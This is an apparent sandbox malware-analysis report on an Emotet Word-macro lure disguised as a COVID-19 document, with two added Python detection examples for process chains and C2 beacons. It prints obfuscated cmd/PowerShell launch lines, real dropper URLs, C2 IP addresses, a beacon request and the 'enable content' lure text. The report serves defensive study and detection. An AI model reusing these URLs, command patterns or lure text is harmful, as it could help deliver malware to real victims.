
Analysis Report AG60273928I_COVID-19_SARS-CoV-2.doc

Overview

General Information

Sample Name: AG60273928I_COVID-19_SARS-CoV-2.doc
Analysis ID: 338719
MD5: 6d718814f5cf1ccd99905fdac40a504a
SHA1: f1746098ad2bb75e3054351b190cc818712ae46a
SHA256: 6bb1fa2cba1d52674b980804939a39bb7dc3a68a364402d393e6a3ae520cdce9
Tags: doc, Heodo

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1604 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2340 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2608 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2692 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 960 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2916 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2956 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
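The Startup tree above is the launch chain an endpoint sensor would see: Word spawns cmd.exe, cmd.exe spawns an obfuscated PowerShell, PowerShell hands the dropped DLL to rundll32.exe, and rundll32.exe re-launches itself from a copy placed under a random SysWOW64 subdirectory with a non-DLL extension. The following is an added example (not Joe Sandbox code) that replays that tree through the parent/child rules a detection engineer would write for it. The ProcEvent records are constructed from the tree; the full image paths of the lolbins are assumed from their names, and the real -ENCOD blob is replaced by the placeholder <blob>. Because the report also records WINWORD.EXE creating processes through WMI (Win32_Process::Create), the example carries the rule for the WmiPrvSE.exe parent that a plain Office-to-shell rule would miss.

```python
"""Added example, not Joe Sandbox code: parent/child rules for the Emotet launch chain.
Events are CONSTRUCTED from the report's Startup tree; image paths are assumed."""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str   # full path of the creator as the sensor recorded it


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL64 = r"C:\Windows\System32\rundll32.exe"
RUNDLL32 = r"C:\Windows\SysWOW64\rundll32.exe"

# Constructed from the report's Startup tree (PIDs and command lines as listed there).
EVENTS = [
    ProcEvent(2340, CMD, "cmd cmd cmd cmd /c msg %username% /v Word experienced an error "
              "trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD <blob>", WINWORD),
    ProcEvent(2608, r"C:\Windows\System32\msg.exe",
              "msg user /v Word experienced an error trying to open the file.", CMD),
    ProcEvent(2692, PS, "POwersheLL -w hidden -ENCOD <blob>", CMD),
    ProcEvent(960, RUNDLL64, r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA", PS),
    ProcEvent(2916, RUNDLL32, r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA", RUNDLL64),
    ProcEvent(2956, RUNDLL32, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA", RUNDLL32),
    ProcEvent(2908, RUNDLL32, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA", RUNDLL32),
    ProcEvent(2484, RUNDLL32, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA", RUNDLL32),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
# "<path> <export>" or "'<path>',<export>" after the rundll32.exe image; quotes are optional.
RUNDLL_ARGS = re.compile(r"""rundll32\.exe['"]?\s+['"]?([^'",\s]+)['"]?\s*,?\s*(\w+)""", re.I)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def rundll32_module(cmdline: str):
    """Return (module path, export name) from a rundll32 command line, or (None, None)."""
    m = RUNDLL_ARGS.search(cmdline)
    return (m.group(1), m.group(2)) if m else (None, None)


def evaluate(ev: ProcEvent) -> list[str]:
    """Names of the rules a single process-creation event trips, in evaluation order."""
    parent, child = base(ev.parent_image), base(ev.image)
    hits = []
    if parent in OFFICE and child in SHELLS:
        hits.append("office-spawns-shell")
    # When Office launches the shell via WMI (Win32_Process.Create, as this report records),
    # the sensor sees WmiPrvSE.exe as the parent and the rule above never fires.
    if parent == "wmiprvse.exe" and child in SHELLS:
        hits.append("wmi-spawns-shell")
    if child == "rundll32.exe":
        if parent in SHELLS:
            hits.append("shell-spawns-rundll32")
        module, _export = rundll32_module(ev.cmdline)
        if module:
            lowered = module.lower()
            if lowered.startswith("c:\\users\\"):
                hits.append("rundll32-module-under-users")
            if ntpath.splitext(lowered)[1] not in DLL_EXTS:
                hits.append("rundll32-module-nonstandard-extension")
            parent_dir = ntpath.dirname(lowered)
            # Emotet's copy lives one level below SysWOW64, never in SysWOW64 itself.
            if parent_dir.startswith("c:\\windows\\") and parent_dir not in SYSTEM_DIRS:
                hits.append("rundll32-module-in-windows-subdir")
    return hits


def triage_tree(events) -> dict[int, list[str]]:
    return {ev.pid: evaluate(ev) for ev in events}


def chain_detected(events) -> bool:
    """True when one tree shows (Office or WMI) -> shell -> rundll32 loading from a user path."""
    found = {h for ev in events for h in evaluate(ev)}
    return bool({"office-spawns-shell", "wmi-spawns-shell"} & found) \
        and "shell-spawns-rundll32" in found and "rundll32-module-under-users" in found


if __name__ == "__main__":
    for pid, hits in triage_tree(EVENTS).items():
        print(pid, hits)
    print("chain detected:", chain_detected(EVENTS))
```

The per-event rules are deliberately narrow so each one stays low-noise on its own; the tree-level check is what produces the alert. The ShowDialogA export name is left out of the rules on purpose: Emotet rotates export names, and the parent/child shape plus the module location survive that rotation.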

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1f10:$s1: POwersheLL
00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x890:$s1: POwersheLL

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: https://trayonlinegh.com/cgi-bin/HBPR/ | Avira URL Cloud: Label: malware
Source: https://capturetheaction.com.au/wp-includes/Yjp/ | Avira URL Cloud: Label: malware
Source: https://shulovbaazar.com/c/bcL6/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | Virustotal: Detection: 26%
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ws\dll\mscorlib.pdb | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb | source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: shulovbaazar.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 51.79.161.36:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49170 -> 71.72.196.159:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: http://uhk.cncranes.com/ErrorPages/3/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in memory: http://mmo.martinpollock.co.uk/a/SQSGg/
Source: global traffic | HTTP traffic detected: GET /ErrorPages/3/ HTTP/1.1 ; Host: uhk.cncranes.com ; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 71.72.196.159
Source: Joe Sandbox View | ASN Name: TWC-10796-MIDWESTUS
Source: Joe Sandbox View | ASN Name: REGISTER_UK-ASGB
Source: global traffic | HTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1 ; DNT: 0 ; Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/ ; Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vI ; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) ; Host: 69.49.88.46 ; Content-Length: 5572 ; Connection: Keep-Alive ; Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 71.72.196.159 (2 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46 (8 connections)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmp
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: shulovbaazar.com
Source: unknown | HTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1 ; DNT: 0 ; Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/ ; Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vI ; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) ; Host: 69.49.88.46 ; Content-Length: 5572 ; Connection: Keep-Alive ; Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: http://mmo.martinpollock.co.uk/a/SQSGg/
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | String found in binary or memory: http://uhk.cncranes.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: http://uhk.cncranes.com/ErrorPages/3/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2120077438.0000000002820000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp | String found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | String found in binary or memory: https://mybusinessevent.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | String found in binary or memory: https://mybusinessevent.comp
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp | String found in binary or memory: https://shulovbaazar.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | String found in binary or memory: https://shulovbaazar.comp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | String found in binary or memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
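Two of the network verdicts above are worth re-deriving from raw artifacts rather than trusting the signature names: "TCP traffic detected without corresponding DNS query" (the C2 servers 71.72.196.159 and 69.49.88.46 are contacted by hard-coded IP, while only shulovbaazar.com was ever resolved) and the shape of the POST beacon (bare-IP Host, scheme-less Referer that mirrors the request path, multipart/form-data body, browser User-Agent sent by rundll32.exe). The following is an added example, not Joe Sandbox code. SAMPLE_POST is the report's POST request reflowed into a real HTTP head with the User-Agent shortened; the flow records and the DNS answer table are constructed, and the pairing of shulovbaazar.com with 51.79.161.36 is an assumption drawn from the adjacent DNS and TCP lines. One caveat the code encodes: "Mozilla/4.0 (compatible; MSIE 7.0; ... Trident/7.0)" is the string IE11 itself sends in compatibility view, so the User-Agent is only an indicator when the sending process is not a browser.

```python
"""Added example, not Joe Sandbox code: beacon indicators and no-DNS flow correlation.
SAMPLE_POST is reflowed from the report; flows and DNS answers are CONSTRUCTED."""
from dataclasses import dataclass
import ipaddress
import ntpath
import re

# The report's POST, as a real request head (User-Agent shortened).
SAMPLE_POST = (
    "POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1\r\n"
    "DNT: 0\r\n"
    "Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/\r\n"
    "Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vI\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
    "Host: 69.49.88.46\r\n"
    "Content-Length: 5572\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed benign request for comparison.
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Referer: https://example.invalid/\r\n\r\n"
)


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


# Constructed from the report's TCP lines; the DNS mapping is an assumption.
SAMPLE_FLOWS = [
    Flow("192.168.2.22", "51.79.161.36", 443),
    Flow("192.168.2.22", "71.72.196.159", 80),
    Flow("192.168.2.22", "69.49.88.46", 80),
]
SAMPLE_DNS_ANSWERS = {"shulovbaazar.com": {"51.79.161.36"}}

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}


def parse_request(raw: str):
    """Split an HTTP/1.x request head into (method, path, {lowercased header: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_literal_ip(host: str) -> bool:
    """True when the Host header is an IPv4 literal (optionally with :port)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def beacon_indicators(raw: str, process_image: str) -> list[str]:
    """Names of the beacon traits present in the request, in evaluation order."""
    method, path, h = parse_request(raw)
    host, referer, ua = h.get("host", ""), h.get("referer", ""), h.get("user-agent", "")
    hits = []
    if is_literal_ip(host):
        hits.append("host-is-ip")
    if referer and not re.match(r"(?i)https?://", referer):
        hits.append("referer-without-scheme")
    if referer and referer.startswith(host + path):
        hits.append("referer-mirrors-request")
    if method == "POST" and h.get("content-type", "").lower().startswith("multipart/form-data"):
        hits.append("multipart-post")
    if not ua:
        hits.append("no-user-agent")
    elif ua.startswith("Mozilla/") and ntpath.basename(process_image).lower() not in BROWSERS:
        hits.append("browser-ua-from-non-browser")
    return hits


def flows_without_dns(flows, dns_answers) -> list[Flow]:
    """Connections whose destination never appeared in a DNS answer during the run."""
    resolved = set().union(*dns_answers.values()) if dns_answers else set()
    return [f for f in flows if f.dst not in resolved]


if __name__ == "__main__":
    print(beacon_indicators(SAMPLE_POST, r"C:\Windows\SysWOW64\rundll32.exe"))
    print([f.dst for f in flows_without_dns(SAMPLE_FLOWS, SAMPLE_DNS_ANSWERS)])
```

The no-DNS check is only as good as the DNS log it is fed: a resolver cache, DoH, or a hosts-file entry all produce a legitimate connection with no visible query, so treat the result as a triage filter, not a verdict.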

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll
Very long command line found
Source: unknown | Process created: Commandline size = 5517
Source: unknown | Process created: Commandline size = 5421
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5421
